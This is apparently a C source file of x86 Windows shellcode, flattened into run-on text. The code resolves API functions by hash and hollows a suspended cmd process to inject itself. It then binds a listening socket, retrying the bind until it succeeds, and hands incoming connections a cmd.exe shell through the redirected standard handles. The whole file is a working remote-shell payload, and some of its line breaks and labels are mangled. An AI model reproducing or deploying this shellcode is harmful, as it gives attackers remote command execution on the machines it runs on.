📄 shellcode_rebind.c
pop ecx GetKFuncAddr: ; find functions from kernel32.dll call find_hashfunc_addr loop GetKFuncAddr call proc_fork ; process forking /* nop nop nop nop int 3 */ jmp locate_fork_func ; locate functions address in fork processfork_func: pop esi add esi, 5 ; jump call locate_addr instruction bytes lea edi, [esi+0x20] ; hash of ws2_32.dll push 3233h push 5F327377h ; ws2_32 push esp call dword ptr [esi+_LoadLibraryA] mov ebp, eax ; base address of ws2_32.dll push _Wnums pop ecx GetWFuncAddr: ; find functions from ws2_32.dll call find_hashfunc_addr loop GetWFuncAddr
add edi, 4 ; skip port variable // shellcode function start sub esp, 190h push esp push 101h call dword ptr [esi+_WSAStartup] ; WSAStartup(0x101, &WSADATA[0x190 bytes!]) push eax push eax push eax push eax push 1 push 2 call dword ptr [esi+_WSASocketA] ; WSASocketA(2,1,0,0,0,0) mov ebx, eax ; socket handle xor eax, eax
push eax
push eax ; sockaddr_in.sin_addr=0.0.0.0
mov dx, word ptr [esi+_port]
xchg dl, dh
ror edx, 10h
mov dx, 0x0002
push edx ; sockaddr_in.sin_port
mov edx, esp rebind: push ebx push edx push 16h push edx push ebx call dword ptr [esi+_bind] ; loop bind pop edx pop ebx test eax, eax jnz rebind push 1 push ebx call dword ptr [esi+_listen] push eax push eax push ebx call dword ptr [esi+_accept] mov ebx, eax ; ebx = socket push 646D63h ; "cmd" mov edx, esp sub esp, 54h mov edi, esp push 14h pop ecx xor eax, eax stack_zero: mov [edi+ecx*4], eax loop stack_zero mov byte ptr [edi+10h], 44h ; si.cb = sizeof(si) inc byte ptr [edi+3Ch] ; si.dwFlags = 0x100 inc byte ptr [edi+3Dh] ; dwFlags mov [edi+48h], ebx ; si.hStdInput = socket mov [edi+4Ch], ebx ; hStdOutput = socket mov [edi+50h], ebx ; hStdError = socket lea eax, [edi+10h] push edi push eax push ecx push ecx push ecx push 1 push ecx push ecx push edx ; "cmd" push ecx call dword ptr [esi+_CreateProcessA] xor eax, eax dec eax push eax call dword ptr [esi+_TerminateProcess]; from lsd's winasm paper and codeproc_fork: mov ebp, esp ; return address push 646D63h ; "cmd" mov edx, esp sub esp, 54h ; structure of pi(16) and si(68) mov edi, esp xor eax, eax push 14h pop ecx stack_zero1: mov [edi+ecx*4], eax loop stack_zero1 mov byte ptr [edi+10h], 44h inc byte ptr [edi+3Ch] inc byte ptr [edi+3Dh] mov [edi+48h], eax mov [edi+4Ch], eax mov [edi+50h], eax lea eax, [edi+10h] ; si push edi ; Pointer to PROCESS_INFORMATION structure. push eax ; Pointer to STARTUPINFO structure. push ecx ; Use parent's starting directory. push ecx ; Use parent's environment block. push 4 ; The primary thread of the new process is created in a suspended state, and does not run until the ResumeThread function is called. push ecx ; Set handle inheritance to FALSE. push ecx ; Thread handle not inheritable. push ecx ; Process handle not inheritable. 
push edx ; "cmd" push ecx ; No module name (use command line) call dword ptr [esi+_CreateProcessA] sub esp, 400h push 00010007h push esp push dword ptr [edi+0x04] ; thread handle call dword ptr [esi+_GetThreadContext] push 40h push 1000h push 5000h push 0 push dword ptr [edi] ; process handle call dword ptr [esi+_VirtualAllocEx] ; v=VirtualAllocEx(pi.hProcess,NULL,0x5000,MEM_COMMIT,PAGE_EXECUTE_READWRITE); //mov ebx, eax ; buf=allocated memory // CONTEXT structure: // +0x08c SegGs // +0x090 SegFs // +0x094 SegEs // +0x098 SegDs // +0x09c Edi // +0x0a0 Esi // +0x0a4 Ebx // +0x0a8 Edx // +0x0ac Ecx // +0x0b0 Eax // +0x0b4 Ebp // +0x0b8 Eip // +0x0bc SegCs // +0x0c0 EFlags // +0x0c4 Esp // +0x0c8 SegSs mov [esp+0B8h], eax ; ctx.Eip=buf_addr mov [esp+0B4h], eax ; ctx.Ebp=buf_addr mov ecx, [ebp] ; return address push 0 push 0800h push ecx push eax push dword ptr [edi] ; process handle call dword ptr [esi+_WriteProcessMemory] ; WriteProcessMemory(pi.hProcess,v,buf,sizeof(buf),NULL); push esp push dword ptr [edi+0x04] ; thread handle call dword ptr [esi+_SetThreadContext] ; SetThreadContext(pi.hThread,&ctx) push dword ptr [edi+0x04] ; thread handle call dword ptr [esi+_ResumeThread] ; ResumeThread(pi.hThread); xor eax, eax dec eax push eax call dword ptr [esi+_TerminateProcess] // shellcode function end find_hashfunc_addr: push ecx push esi mov esi, [ebp+3Ch] ; e_lfanew mov esi, [esi+ebp+78h] ; ExportDirectory RVA add esi, ebp ; rva2va push esi mov esi, [esi+20h] ; AddressOfNames RVA add esi, ebp ; rva2va xor ecx, ecx dec ecx find_start: inc ecx lodsd add eax, ebp xor ebx, ebx hash_loop: movsx edx, byte ptr [eax] cmp dl, dh jz short find_addr ror ebx, 7 ; hash add ebx, edx inc eax jmp short hash_loop find_addr: cmp ebx, [edi] ; compare to hash jnz short find_start pop esi ; ExportDirectory mov ebx, [esi+24h] ; AddressOfNameOrdinals RVA add ebx, ebp ; rva2va mov cx, [ebx+ecx*2] ; FunctionOrdinal mov ebx, [esi+1Ch] ; AddressOfFunctions RVA add ebx, ebp ; rva2va mov eax, 
[ebx+ecx*4] ; FunctionAddress RVA add eax, ebp ; rva2va stosd ; function address save to [edi] pop esi pop ecx retn locate_fork_func: call fork_func ; fork process locate functions address locate_addr: call func_startPROC_END //C macro to end proc }}